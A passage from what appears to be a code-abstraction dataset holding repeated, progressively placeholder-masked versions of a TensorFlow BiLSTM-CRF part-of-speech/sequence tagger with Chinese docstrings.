args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, 
tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = 
tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\n<function token>\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 
字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n 
:return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, 
mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n<function token>\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 
'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n<function token>\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, 
out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = 